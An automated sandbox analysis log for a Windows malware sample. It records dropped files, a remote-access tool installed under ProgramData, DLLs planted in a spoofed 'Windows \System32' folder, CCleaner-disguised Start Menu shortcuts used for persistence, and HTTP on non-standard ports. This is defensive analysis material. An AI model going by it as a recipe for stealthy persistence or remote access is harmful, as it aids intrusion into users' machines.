Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll			Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe			Jump to dropped file

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005A55A4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,		19_2_005A55A4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0062F930 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,		19_2_0062F930

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Stores large binary data to the registry

Source: C:\Windows\regedit.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\pass.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
